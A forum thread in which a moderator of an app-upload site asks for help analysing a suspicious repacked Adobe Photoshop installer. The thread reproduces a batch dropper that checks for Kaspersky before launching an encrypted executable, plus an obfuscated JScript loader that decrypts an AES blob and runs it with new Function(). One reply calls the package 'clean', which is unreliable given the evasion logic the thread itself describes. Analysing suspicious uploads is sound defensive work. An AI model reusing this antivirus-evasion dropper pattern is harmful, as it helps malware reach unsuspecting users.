Need help where to go

June 18, 2020 at 09:25:11
Specs: Windows 10
Hi! Im a moderator on a site where people upload apps. I am a bit worried about one of our uploaders where he is uploading apps that may be malicious to our users. I found a batch script in one of his uploads. I was wondering where I can get someone to look at the code of what it really does? Its a short code.

Thanks


See More: Need help where to go

Reply ↓  Report •

#1
June 18, 2020 at 10:16:16
You can post the source code of this batch script here and we will read it and trying to understand what he does exactly !

message edited by Hackoo


Reply ↓  Report •

#2
June 18, 2020 at 10:18:13
��&cls
@echo off
cd ../../products
setlocal enableDelayedExpansion enableextensions
set LIST=
for /f "delims=" %%F in ('wmic /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName') do set LIST=!LIST! %%F


set "regexp=.*kasper.*"

echo( %LIST%|findstr /i /r /c:"%regexp%" >nul && (

move AdobePhotoshop21-Core_x64.dat ../Set-up.exe
start ../Set-up.exe

echo " "


) || (

echo " "
cd ../
move Set-up.exe products/AdobePhotoshop21-Core_x64.data
timeout 1 nul 2>&1
cd packages/ADC
if exist ADC (
cd ../../products
move AdobePhotoshop21-Core_x64.dat ../Set-up.exe
timeout 1 nul 2>&1
start ../Set-up.exe
cd ../packages/ADC
start wscript //E:jscript ADC %1
) else (
echo "Error : Please Extract compressed file first ..."
pause
)
)

rename ADC_version.bat ADC_version.msi


Reply ↓  Report •

#3
June 18, 2020 at 10:26:06
i found the ADC file and i decompressed from compressed java to readable js. Im conserned that it hijacks/run the wscript and runs the spyware/keylogger throught it

Reply ↓  Report •

Related Solutions

#4
June 18, 2020 at 11:07:08
If this user is a problem, why not just ban him/her?

"Channeling the spirit of jboy..."


Reply ↓  Report •

#5
June 18, 2020 at 11:32:24
This user uploads a lot of good stuf on site, but when I analyse and comparing hes/here uploads to other uploaders identical apps the results show different on this user, I need some proof before banning him/here

message edited by hawk9


Reply ↓  Report •

#6
June 18, 2020 at 11:57:16
We need to read this file : AdobePhotoshop21-Core_x64.dat
Edit this file with notepad and post its contents !
Or compress all files with ADC and .js files and upload them on medafire for example.

message edited by Hackoo


Reply ↓  Report •

#7
June 18, 2020 at 12:36:20
AdobePhotoshop21-Core_x64.dat file is 5,22 mb and content is encrypted. But was able to read something of it but it was only urls and encrypted strings. what aboute the ADC file? that i have in notepad

Reply ↓  Report •

#8
June 18, 2020 at 13:15:38
Where is the .js file source code ? Please if you still have it just post its contents ! otherwise we cannot confirm if it's a malicious code or not

message edited by Hackoo


Reply ↓  Report •

#9
June 18, 2020 at 14:27:12
try { /*EBqVZdRY3vckXwfDxiuUuG6cKTfFsSxPFKlRILFcynCEf7VPNZgkQMIobeDfBLRmFI09cMC4BJhSOo0iRHpaBrdjGZjEWemUCCTX8QhhJT0kgQoV8CtvBt1zrBplo8G*/ /*t8w8pYXEfDogzAp9wBi4YQGBS9BJfmdxX8L0hoo8EyoFWadQ5qRYrT2JFACeSfGhXn09YBJ1IXWENNZuroaUrUIZtSGK3PXyDQvBt7ACZVDXbSiCECB5VhmFFBiI2VLJ9v*/ /*CCm28IGWpopVwFVC1mwdxUxjL52nyG7uMx9hYWPuHrIAOyLuvDVSjBUisR5fidcwiOXrHoEir7LNAh1iSu9ciy26k6o8oaJMemDw8eVBvYrY1c7jg4mxWF8GovOq0*/
var Csr0XBh6XD9JRyCh = Csr0XBh6XD9JRyCh || function(c) {
function r() {}
var t = {},
e = t.lib = {},
i = e.Base = {
extend: function(t) {
r.prototype = this;
var e = new r;
return t && e.mixIn(t), e.hasOwnProperty('init') || (e.init = function() {
e.$super.init.apply(this, arguments)
}), (e.init.prototype = e).$super = this, e
},
create: function() {
var t = this.extend();
return t.init.apply(t, arguments), t
},
init: function() {},
mixIn: function(t) {
for(var e in t) t.hasOwnProperty(e) && (this[e] = t[e]);
t.hasOwnProperty('toString') && (this.toString = t.toString)
},
SQ57V5eYWoLZI: function() {
return this.init.prototype.extend(this)
}
},
a = e.WordArray = i.extend({
init: function(t, e) {
t = this.words = t || [], this.ijT6xGzOKwIL3tL = null != e ? e : 4 * t.length
},
toString: function(t) {
return(t || o).stringify(this)
},
concat: function(t) {
var e = this.words,
r = t.words,
i = this.ijT6xGzOKwIL3tL;
if(t = t.ijT6xGzOKwIL3tL, this.clamp(), i % 4)
for(var n = 0; n < t; n++) e[i + n >>> 2] |= (r[n >>> 2] >>> 24 - n % 4 * 8 & 255) << 24 - (i + n) % 4 * 8;
else if(65535 < r.length)
for(n = 0; n < t; n += 4) e[i + n >>> 2] = r[n >>> 2];
else e.push.apply(e, r);
return this.ijT6xGzOKwIL3tL += t, this
},
clamp: function() {
var t = this.words,
e = this.ijT6xGzOKwIL3tL;
t[e >>> 2] &= 4294967295 << 32 - e % 4 * 8, t.length = c.ceil(e / 4)
},
SQ57V5eYWoLZI: function() {
var t = i.SQ57V5eYWoLZI.call(this);
return t.words = this.words.slice(0), t
},
random: function(t) {
for(var e = [], r = 0; r < t; r += 4) e.push(4294967296 * c.random() | 0);
return new a.init(e, t)
}
}),
n = t.ME3svMnfKRN = {},
o = n.Hex = {
stringify: function(t) {
var e = t.words;
t = t.ijT6xGzOKwIL3tL;
for(var r = [], i = 0; i < t; i++) {
var n = e[i >>> 2] >>> 24 - i % 4 * 8 & 255;
r.push((n >>> 4).toString(16)), r.push((15 & n).toString(16))
}
return r.join('')
},
parse: function(t) {
for(var e = t.length, r = [], i = 0; i < e; i += 2) r[i >>> 3] |= parseInt(t.substr(i, 2), 16) << 24 - i % 8 * 4;
return new a.init(r, e / 2)
}
},
s = n.Latin1 = {
stringify: function(t) {
var e = t.words;
t = t.ijT6xGzOKwIL3tL;
for(var r = [], i = 0; i < t; i++) r.push(String.fromCharCode(e[i >>> 2] >>> 24 - i % 4 * 8 & 255));
return r.join('')
},
parse: function(t) {
for(var e = t.length, r = [], i = 0; i < e; i++) r[i >>> 2] |= (255 & t.charCodeAt(i)) << 24 - i % 4 * 8;
return new a.init(r, e)
}
},
f = n.zI1DodsmgMo = {
stringify: function(t) {
try {
return decodeURIComponent(escape(s.stringify(t)))
} catch(t) {
throw Error('')
}
},
parse: function(t) {
return s.parse(unescape(encodeURIComponent(t)))
}
},
h = e.BufferedBlockAlgorithm = i.extend({
reset: function() {
this._data = new a.init, this._nDataBytes = 0
},
_append: function(t) {
'string' == typeof t && (t = f.parse(t)), this._data.concat(t), this._nDataBytes += t.ijT6xGzOKwIL3tL
},
_process: function(t) {
var e = this._data,
r = e.words,
i = e.ijT6xGzOKwIL3tL,
n = this.blockSize,
o = i / (4 * n);
if(t = (o = t ? c.ceil(o) : c.max((0 | o) - this._minBufferSize, 0)) * n, i = c.min(4 * t, i), t) {
for(var s = 0; s < t; s += n) this.gLrK0x0V9N62Dqj(r, s);
s = r.splice(0, t), e.ijT6xGzOKwIL3tL -= i
}
return new a.init(s, i)
},
SQ57V5eYWoLZI: function() {
var t = i.SQ57V5eYWoLZI.call(this);
return t._data = this._data.SQ57V5eYWoLZI(), t
},
_minBufferSize: 0
});
e.O8abBUfvYNbeadab = h.extend({
cfg: i.extend(),
init: function(t) {
this.cfg = this.cfg.extend(t), this.reset()
},
reset: function() {
h.reset.call(this), this._doReset()
},
update: function(t) {
return this._append(t), this._process(), this
},
finalize: function(t) {
return t && this._append(t), this._doFinalize()
},
blockSize: 16,
_createHelper: function(r) {
return function(t, e) {
return new r.init(e).finalize(t)
}
},
_createHmacHelper: function(r) {
return function(t, e) {
return new u.HMAC.init(r, e).finalize(t)
}
}
});
var u = t.algo = {};
return t
}(Math);
! function() {
var t = Csr0XBh6XD9JRyCh,
a = t.lib.WordArray;
t.ME3svMnfKRN.Base64 = {
stringify: function(t) {
var e = t.words,
r = t.ijT6xGzOKwIL3tL,
i = this.GVYUXWUqcPWzftZ;
t.clamp(), t = [];
for(var n = 0; n < r; n += 3)
for(var o = (e[n >>> 2] >>> 24 - n % 4 * 8 & 255) << 16 | (e[n + 1 >>> 2] >>> 24 - (n + 1) % 4 * 8 & 255) << 8 | e[n + 2 >>> 2] >>> 24 - (n + 2) % 4 * 8 & 255, s = 0; s < 4 && n + .75 * s < r; s++) t.push(i.charAt(o >>> 6 * (3 - s) & 63));
if(e = i.charAt(64))
for(; t.length % 4;) t.push(e);
return t.join('')
},
parse: function(t) {
var e = t.length,
r = this.GVYUXWUqcPWzftZ;
!(i = r.charAt(64)) || -1 != (i = t.indexOf(i)) && (e = i);
for(var i = [], n = 0, o = 0; o < e; o++)
if(o % 4) {
var s = r.indexOf(t.charAt(o - 1)) << o % 4 * 2,
c = r.indexOf(t.charAt(o)) >>> 6 - o % 4 * 2;
i[n >>> 2] |= (s | c) << 24 - n % 4 * 8, n++
}
return a.create(i, n)
},
GVYUXWUqcPWzftZ: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
}
}(),
function(o) {
function m(t, e, r, i, n, o, s) {
return((t = t + (e & r | ~e & i) + n + s) << o | t >>> 32 - o) + e
}

function z(t, e, r, i, n, o, s) {
return((t = t + (e & i | r & ~i) + n + s) << o | t >>> 32 - o) + e
}

function C(t, e, r, i, n, o, s) {
return((t = t + (e ^ r ^ i) + n + s) << o | t >>> 32 - o) + e
}

function w(t, e, r, i, n, o, s) {
return((t = t + (r ^ (e | ~i)) + n + s) << o | t >>> 32 - o) + e
}
for(var t = Csr0XBh6XD9JRyCh, e = (i = t.lib).WordArray, r = i.O8abBUfvYNbeadab, i = t.algo, D = [], n = 0; n < 64; n++) D[n] = 4294967296 * o.abs(o.sin(n + 1)) | 0;
i = i.MD5 = r.extend({
_doReset: function() {
this._hash = new e.init([1732584193, 4023233417, 2562383102, 271733878])
},
gLrK0x0V9N62Dqj: function(t, e) {
for(var r = 0; r < 16; r++) {
var i = t[s = e + r];
t[s] = 16711935 & (i << 8 | i >>> 24) | 4278255360 & (i << 24 | i >>> 8)
}
r = this._hash.words;
var n, o, s = t[e + 0],
c = (i = t[e + 1], t[e + 2]),
a = t[e + 3],
f = t[e + 4],
h = t[e + 5],
u = t[e + 6],
p = t[e + 7],
d = t[e + 8],
l = t[e + 9],
y = t[e + 10],
_ = t[e + 11],
v = t[e + 12],
g = t[e + 13],
B = t[e + 14],
x = t[e + 15],
S = r[0],
k = w(k = w(k = w(k = w(k = C(k = C(k = C(k = C(k = z(k = z(k = z(k = z(k = m(k = m(k = m(k = m(k = r[1], o = m(o = r[2], n = m(n = r[3], S = m(S, k, o, n, s, 7, D[0]), k, o, i, 12, D[1]), S, k, c, 17, D[2]), n, S, a, 22, D[3]), o = m(o, n = m(n, S = m(S, k, o, n, f, 7, D[4]), k, o, h, 12, D[5]), S, k, u, 17, D[6]), n, S, p, 22, D[7]), o = m(o, n = m(n, S = m(S, k, o, n, d, 7, D[8]), k, o, l, 12, D[9]), S, k, y, 17, D[10]), n, S, _, 22, D[11]), o = m(o, n = m(n, S = m(S, k, o, n, v, 7, D[12]), k, o, g, 12, D[13]), S, k, B, 17, D[14]), n, S, x, 22, D[15]), o = z(o, n = z(n, S = z(S, k, o, n, i, 5, D[16]), k, o, u, 9, D[17]), S, k, _, 14, D[18]), n, S, s, 20, D[19]), o = z(o, n = z(n, S = z(S, k, o, n, h, 5, D[20]), k, o, y, 9, D[21]), S, k, x, 14, D[22]), n, S, f, 20, D[23]), o = z(o, n = z(n, S = z(S, k, o, n, l, 5, D[24]), k, o, B, 9, D[25]), S, k, a, 14, D[26]), n, S, d, 20, D[27]), o = z(o, n = z(n, S = z(S, k, o, n, g, 5, D[28]), k, o, c, 9, D[29]), S, k, p, 14, D[30]), n, S, v, 20, D[31]), o = C(o, n = C(n, S = C(S, k, o, n, h, 4, D[32]), k, o, d, 11, D[33]), S, k, _, 16, D[34]), n, S, B, 23, D[35]), o = C(o, n = C(n, S = C(S, k, o, n, i, 4, D[36]), k, o, f, 11, D[37]), S, k, p, 16, D[38]), n, S, y, 23, D[39]), o = C(o, n = C(n, S = C(S, k, o, n, g, 4, D[40]), k, o, s, 11, D[41]), S, k, a, 16, D[42]), n, S, u, 23, D[43]), o = C(o, n = C(n, S = C(S, k, o, n, l, 4, D[44]), k, o, v, 11, D[45]), S, k, x, 16, D[46]), n, S, c, 23, D[47]), o = w(o, n = w(n, S = w(S, k, o, n, s, 6, D[48]), k, o, p, 10, D[49]), S, k, B, 15, D[50]), n, S, h, 21, D[51]), o = w(o, n = w(n, S = w(S, k, o, n, v, 6, D[52]), k, o, a, 10, D[53]), S, k, y, 15, D[54]), n, S, i, 21, D[55]), o = w(o, n = w(n, S = w(S, k, o, n, d, 6, D[56]), k, o, x, 10, D[57]), S, k, u, 15, D[58]), n, S, g, 21, D[59]), o = w(o, n = w(n, S = w(S, k, o, n, f, 6, D[60]), k, o, _, 10, D[61]), S, k, c, 15, D[62]), n, S, l, 21, D[63]);
r[0] = r[0] + S | 0, r[1] = r[1] + k | 0, r[2] = r[2] + o | 0, r[3] = r[3] + n | 0
},
_doFinalize: function() {
var t = this._data,
e = t.words,
r = 8 * this._nDataBytes,
i = 8 * t.ijT6xGzOKwIL3tL;
e[i >>> 5] |= 128 << 24 - i % 32;
var n = o.floor(r / 4294967296);
for(e[15 + (i + 64 >>> 9 << 4)] = 16711935 & (n << 8 | n >>> 24) | 4278255360 & (n << 24 | n >>> 8), e[14 + (i + 64 >>> 9 << 4)] = 16711935 & (r << 8 | r >>> 24) | 4278255360 & (r << 24 | r >>> 8), t.ijT6xGzOKwIL3tL = 4 * (e.length + 1), this._process(), e = (t = this._hash).words, r = 0; r < 4; r++) i = e[r], e[r] = 16711935 & (i << 8 | i >>> 24) | 4278255360 & (i << 24 | i >>> 8);
return t
},
SQ57V5eYWoLZI: function() {
var t = r.SQ57V5eYWoLZI.call(this);
return t._hash = this._hash.SQ57V5eYWoLZI(), t
}
}), t.MD5 = r._createHelper(i), t.HmacMD5 = r._createHmacHelper(i)
}(Math),
function() {
var t, e = Csr0XBh6XD9JRyCh,
r = (t = e.lib).Base,
f = t.WordArray,
i = (t = e.algo).EvpKDF = r.extend({
cfg: r.extend({
keySize: 4,
O8abBUfvYNbeadab: t.MD5,
iterations: 1
}),
init: function(t) {
this.cfg = this.cfg.extend(t)
},
compute: function(t, e) {
for(var r = (s = this.cfg).O8abBUfvYNbeadab.create(), i = f.create(), n = i.words, o = s.keySize, s = s.iterations; n.length < o;) {
c && r.update(c);
var c = r.update(t).finalize(e);
r.reset();
for(var a = 1; a < s; a++) c = r.finalize(c), r.reset();
i.concat(c)
}
return i.ijT6xGzOKwIL3tL = 4 * o, i
}
});
e.EvpKDF = function(t, e, r) {
return i.create(r).compute(t, e)
}
}(), Csr0XBh6XD9JRyCh.lib.Cipher || function() {
var t = (p = Csr0XBh6XD9JRyCh).lib,
e = t.Base,
s = t.WordArray,
r = t.BufferedBlockAlgorithm,
i = p.ME3svMnfKRN.Base64,
n = p.algo.EvpKDF,
o = t.Cipher = r.extend({
cfg: e.extend(),
hLJ8tNZt21oS: function(t, e) {
return this.create(this._ENC_XFORM_MODE, t, e)
},
createpJmSG94rfunor: function(t, e) {
return this.create(this._DEC_XFORM_MODE, t, e)
},
init: function(t, e, r) {
this.cfg = this.cfg.extend(r), this._xformMode = t, this._key = e, this.reset()
},
reset: function() {
r.reset.call(this), this._doReset()
},
process: function(t) {
return this._append(t), this._process()
},
finalize: function(t) {
return t && this._append(t), this._doFinalize()
},
keySize: 4,
ivSize: 4,
_ENC_XFORM_MODE: 1,
_DEC_XFORM_MODE: 2,
_createHelper: function(i) {
return {
encrypt: function(t, e, r) {
return('string' == typeof e ? d : u).encrypt(i, t, e, r)
},
pJmSG94rfun: function(t, e, r) {
return('string' == typeof e ? d : u).pJmSG94rfun(i, t, e, r)
}
}
}
});
t.StreamCipher = o.extend({
_doFinalize: function() {
return this._process(!0)
},
blockSize: 1
});

function c(t, e, r) {
var i = this._iv;
i ? this._iv = void 0 : i = this._prevBlock;
for(var n = 0; n < r; n++) t[e + n] ^= i[n]
}
var a = p.mode = {},
f = (t.BlockCipherMode = e.extend({
hLJ8tNZt21oS: function(t, e) {
return this.Encryptor.create(t, e)
},
createpJmSG94rfunor: function(t, e) {
return this.pJmSG94rfunor.create(t, e)
},
init: function(t, e) {
this._cipher = t, this._iv = e
}
})).extend();
f.Encryptor = f.extend({
processBlock: function(t, e) {
var r = this._cipher,
i = r.blockSize;
c.call(this, t, e, i), r.encryptBlock(t, e), this._prevBlock = t.slice(e, e + i)
}
}), f.pJmSG94rfunor = f.extend({
processBlock: function(t, e) {
var r = this._cipher,
i = r.blockSize,
n = t.slice(e, e + i);
r.pJmSG94rfunBlock(t, e), c.call(this, t, e, i), this._prevBlock = n
}
}), a = a.CBC = f, f = (p.pad = {}).Pkcs7 = {
pad: function(t, e) {
for(var r, i = (r = (r = 4 * e) - t.ijT6xGzOKwIL3tL % r) << 24 | r << 16 | r << 8 | r, n = [], o = 0; o < r; o += 4) n.push(i);
r = s.create(n, r), t.concat(r)
},
unpad: function(t) {
t.ijT6xGzOKwIL3tL -= 255 & t.words[t.ijT6xGzOKwIL3tL - 1 >>> 2]
}
}, t.BlockCipher = o.extend({
cfg: o.cfg.extend({
mode: a,
padding: f
}),
reset: function() {
o.reset.call(this);
var t = (e = this.cfg).iv,
e = e.mode;
if(this._xformMode == this._ENC_XFORM_MODE) var r = e.hLJ8tNZt21oS;
else r = e.createpJmSG94rfunor, this._minBufferSize = 1;
this._mode = r.call(e, this, t && t.words)
},
gLrK0x0V9N62Dqj: function(t, e) {
this._mode.processBlock(t, e)
},
_doFinalize: function() {
var t = this.cfg.padding;
if(this._xformMode == this._ENC_XFORM_MODE) {
t.pad(this._data, this.blockSize);
var e = this._process(!0)
} else e = this._process(!0), t.unpad(e);
return e
},
blockSize: 4
});
var h = t.CipherParams = e.extend({
init: function(t) {
this.mixIn(t)
},
toString: function(t) {
return(t || this.formatter).stringify(this)
}
}),
u = (a = (p.format = {}).OpenSSL = {
stringify: function(t) {
var e = t.ciphertext;
return((t = t.salt) ? s.create([1398893684, 1701076831]).concat(t).concat(e) : e).toString(i)
},
parse: function(t) {
var e = (t = i.parse(t)).words;
if(1398893684 == e[0] && 1701076831 == e[1]) {
var r = s.create(e.slice(2, 4));
e.splice(0, 4), t.ijT6xGzOKwIL3tL -= 16
}
return h.create({
ciphertext: t,
salt: r
})
}
}, t.SerializableCipher = e.extend({
cfg: e.extend({
format: a
}),
encrypt: function(t, e, r, i) {
i = this.cfg.extend(i);
var n = t.hLJ8tNZt21oS(r, i);
return e = n.finalize(e), n = n.cfg, h.create({
ciphertext: e,
key: r,
iv: n.iv,
algorithm: t,
mode: n.mode,
padding: n.padding,
blockSize: t.blockSize,
formatter: i.format
})
},
pJmSG94rfun: function(t, e, r, i) {
return i = this.cfg.extend(i), e = this._parse(e, i.format), t.createpJmSG94rfunor(r, i).finalize(e.ciphertext)
},
_parse: function(t, e) {
return 'string' == typeof t ? e.parse(t, this) : t
}
})),
p = (p.kdf = {}).OpenSSL = {
execute: function(t, e, r, i) {
return i || (i = s.random(8)), t = n.create({
keySize: e + r
}).compute(t, i), r = s.create(t.words.slice(e), 4 * r), t.ijT6xGzOKwIL3tL = 4 * e, h.create({
key: t,
iv: r,
salt: i
})
}
},
d = t.PasswordBasedCipher = u.extend({
cfg: u.cfg.extend({
kdf: p
}),
encrypt: function(t, e, r, i) {
return r = (i = this.cfg.extend(i)).kdf.execute(r, t.keySize, t.ivSize), i.iv = r.iv, (t = u.encrypt.call(this, t, e, r.key, i)).mixIn(r), t
},
pJmSG94rfun: function(t, e, r, i) {
return i = this.cfg.extend(i), e = this._parse(e, i.format), r = i.kdf.execute(r, t.keySize, t.ivSize, e.salt), i.iv = r.iv, u.pJmSG94rfun.call(this, t, e, r.key, i)
}
})
}(),
function() {
for(var t = Csr0XBh6XD9JRyCh, e = t.lib.BlockCipher, r = t.algo, s = [], i = [], n = [], o = [], c = [], a = [], f = [], h = [], u = [], p = [], d = [], l = 0; l < 256; l++) d[l] = l < 128 ? l << 1 : l << 1 ^ 283;
var y = 0,
_ = 0;
for(l = 0; l < 256; l++) {
var v = (v = _ ^ _ << 1 ^ _ << 2 ^ _ << 3 ^ _ << 4) >>> 8 ^ 255 & v ^ 99;
s[y] = v;
var g = d[i[v] = y],
B = d[g],
x = d[B],
S = 257 * d[v] ^ 16843008 * v;
n[y] = S << 24 | S >>> 8, o[y] = S << 16 | S >>> 16, c[y] = S << 8 | S >>> 24, a[y] = S, S = 16843009 * x ^ 65537 * B ^ 257 * g ^ 16843008 * y, f[v] = S << 24 | S >>> 8, h[v] = S << 16 | S >>> 16, u[v] = S << 8 | S >>> 24, p[v] = S, y ? (y = g ^ d[d[d[x ^ g]]], _ ^= d[d[_]]) : y = _ = 1
}
var k = [0, 1, 2, 4, 8, 16, 32, 64, 128, 27, 54];
r = r.sQqhlSS9cIw1nmi = e.extend({
_doReset: function() {
for(var t = (r = this._key).words, e = r.ijT6xGzOKwIL3tL / 4, r = 4 * ((this._nRounds = e + 6) + 1), i = this._keySchedule = [], n = 0; n < r; n++)
if(n < e) i[n] = t[n];
else {
var o = i[n - 1];
n % e ? 6 < e && 4 == n % e && (o = s[o >>> 24] << 24 | s[o >>> 16 & 255] << 16 | s[o >>> 8 & 255] << 8 | s[255 & o]) : (o = s[(o = o << 8 | o >>> 24) >>> 24] << 24 | s[o >>> 16 & 255] << 16 | s[o >>> 8 & 255] << 8 | s[255 & o], o ^= k[n / e | 0] << 24), i[n] = i[n - e] ^ o
}
for(t = this._invKeySchedule = [], e = 0; e < r; e++) n = r - e, o = e % 4 ? i[n] : i[n - 4], t[e] = e < 4 || n <= 4 ? o : f[s[o >>> 24]] ^ h[s[o >>> 16 & 255]] ^ u[s[o >>> 8 & 255]] ^ p[s[255 & o]]
},
encryptBlock: function(t, e) {
this._doCryptBlock(t, e, this._keySchedule, n, o, c, a, s)
},
pJmSG94rfunBlock: function(t, e) {
var r = t[e + 1];
t[e + 1] = t[e + 3], t[e + 3] = r, this._doCryptBlock(t, e, this._invKeySchedule, f, h, u, p, i), r = t[e + 1], t[e + 1] = t[e + 3], t[e + 3] = r
},
_doCryptBlock: function(t, e, r, i, n, o, s, c) {
for(var a = this._nRounds, f = t[e] ^ r[0], h = t[e + 1] ^ r[1], u = t[e + 2] ^ r[2], p = t[e + 3] ^ r[3], d = 4, l = 1; l < a; l++) {
var y = i[f >>> 24] ^ n[h >>> 16 & 255] ^ o[u >>> 8 & 255] ^ s[255 & p] ^ r[d++],
_ = i[h >>> 24] ^ n[u >>> 16 & 255] ^ o[p >>> 8 & 255] ^ s[255 & f] ^ r[d++],
v = i[u >>> 24] ^ n[p >>> 16 & 255] ^ o[f >>> 8 & 255] ^ s[255 & h] ^ r[d++];
p = i[p >>> 24] ^ n[f >>> 16 & 255] ^ o[h >>> 8 & 255] ^ s[255 & u] ^ r[d++], f = y, h = _, u = v
}
y = (c[f >>> 24] << 24 | c[h >>> 16 & 255] << 16 | c[u >>> 8 & 255] << 8 | c[255 & p]) ^ r[d++], _ = (c[h >>> 24] << 24 | c[u >>> 16 & 255] << 16 | c[p >>> 8 & 255] << 8 | c[255 & f]) ^ r[d++], v = (c[u >>> 24] << 24 | c[p >>> 16 & 255] << 16 | c[f >>> 8 & 255] << 8 | c[255 & h]) ^ r[d++], p = (c[p >>> 24] << 24 | c[f >>> 16 & 255] << 16 | c[h >>> 8 & 255] << 8 | c[255 & u]) ^ r[d++], t[e] = y, t[e + 1] = _, t[e + 2] = v, t[e + 3] = p
},
keySize: 8
});
t.sQqhlSS9cIw1nmi = e._createHelper(r)
}();

function Na9tzNOyOId8tjR(WxEtVAlV6Ad) {
return WxEtVAlV6Ad.split('').reverse().join('');
};

function Jrvc1HJbhCk(rvMpMQdvFCB8) {
new Function(rvMpMQdvFCB8)();
};
var GswHxtAqPoxko3Y = Na9tzNOyOId8tjR('==wKMrWiY3u2ww4utdzVtDgH63vCB14V90BEqLM/lmzkZPnkLxNZ1yQFhX/MQzIqk79dtHC3Yv/uTgf+5P3jYQX6i0IiZbcwIKwL9zWe3BT0qrh58CJN22B/1JfPqtvYjwX/rDdcjZHjbrFfhAn6q4DnTNsukm3Y/zJl+WQNbmhZ0x79pfgmW+Xz3N0fuAg6f8nIhVapKQx0gPHc5V4/g9Q18xFPGwOmKL8E06mEHcHIQgbXxXZ3MXg26NUoZsDdTP2N0Y21KJPLEmvYWJDGIsHeqAaKAgv6iDjTiFSBoF5iZ6qaQAEfpwFj8kJp7rLhNwSJYjtuTY5Wn3Ozi/eKL6MESZpjT3LKC/t5bxtpccPb+iLmv9otgswggx3gl55ylEhTz3dQiZ41Rb4S2BsrhY+mxk2I/mdv17xbBcPViGChllXTXTlK0EFwt1M9KDZ8Ahi472qTaUMvG7qdnOREbEbnJxQSBGteUWh1OX3PY/yRwa8GsiQViu/nChOCLFSrlUoYvPKSQmt4ERoF3t1DU/PamR8pIFyIvFyAJ85ytm+c6U1K3T6yqKartOJ3ubBLCl215wGnEQF/LIrbuGIbBGhGMuJtyAJYir4tzs/2a7RX1+BHob2R*/
} catch(e) {}


Reply ↓  Report •

#10
June 18, 2020 at 14:30:01
This is ADC file, decompressed. The signature encryption code at bottom did i have to delete most of because it wasnt place here for to post. And, thank you very mutch for you time seeng through this code!

Reply ↓  Report •

#11
June 18, 2020 at 16:03:55
This .JS file use the same function to encrypt data like this one : CryptoJS-AES

Reply ↓  Report •

#12
June 18, 2020 at 21:43:01
Ok. Is there any way decrypt it to see its source code/functions? Many of our user complains aboute this wscript running this js. btw thank you for your help!

Reply ↓  Report •

#13
June 19, 2020 at 11:59:58
@Hackoo Do you know at least whats going on in the bat file? some detecting AV running on system etc..?

Reply ↓  Report •

#14
June 19, 2020 at 13:00:16
The batch file check what kind of antivirus is installed on the machine !
If kaspersky Antivirus is installed , he skip running the spyware or the malicious code to avoid detecting from him !

message edited by Hackoo


Reply ↓  Report •

#15
June 19, 2020 at 13:18:52
But why do the script rename ADC_version.msi to ADC_version.bat in first place running script? then rename it back again ADC_version.bat to ADC_version.msi..?

Reply ↓  Report •

#16
June 19, 2020 at 13:45:34
Try to upload the package here for analysis by drag and drop !
https://www.hybrid-analysis.com/
This is a free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology.

Reply ↓  Report •

#17
June 20, 2020 at 01:45:12
https://www.hybrid-analysis.com/sam...

Im familiar with using hybrid and joesendbox. This could be a false positive but I just dont get why file extension needs to be renamed. This renaming was leading me to the ADC js file in first place. Iv manage to decompress ADC file from unreadable content but still is encrypted (above). Ill need to decrypt its content to get source code no?

message edited by hawk9


Reply ↓  Report •

#18
June 21, 2020 at 11:32:12
If someone are able to help me further it would mutch appreciated

Reply ↓  Report •

#19
June 22, 2020 at 06:34:22
You are absolutely right, the moderator should ban that user, do you know if any user will download that file then you will get in a lot of trouble, please request that do not upload malicious batch script file from everyone. Thank you.

Reply ↓  Report •

#20
June 22, 2020 at 12:55:35
I will not start banning ppl if i dont get any proof of this code. It could have other trends as well thats not a reason to ban or kick someone, thats why i need help with the js code to confirm its malicious

Reply ↓  Report •

#21
June 24, 2020 at 08:55:06
Hackoo can you guide me on next steps on js file?

Reply ↓  Report •

#22
June 24, 2020 at 20:47:33
It looks like the batch checks for Kaspersky installed, and if so, the adobe-core.dat can be run as set-up.exe, and Kaspersky will handle the decomp/decrypt. If not, it tries the same file, but using ADC.js to handle the decomp/decrypt. Since the initial attempt is made using Kaspersky on an existing file, presumably included with adobe photo-shop package, I would conclude that the second approach, running the .dat through ADC.js, is also hygienic. Since this is specific to a Adobe photoshop install/upgrade, and to certain OS', it would need that environment to test from ground up, but on reflection, I would give it a "clean". You might post also to https://www.computing.net/forum/sec... since that group has tons more experience.

Reply ↓  Report •

#23
June 27, 2020 at 02:02:47
Thanx @nbrane for a little more insight and understanding on the activity running. Also thanx to @Hackoo for previous messages. Ill make a post on that link nbrane, I have to admit this is just out of my skill range. I just dont get why ADC file needs to be encrypted other then hide its source code. Also I tried to delete the bat file and ADC and then trying to install Adobe, but the setup.exe disapared when double clicked it. Then i didnt delete the bat file or ADC file, I just edited the ADC code (messed-up the code) and run'd setup.exe. It did install like normally then.. weird..

Reply ↓  Report •

Ask Question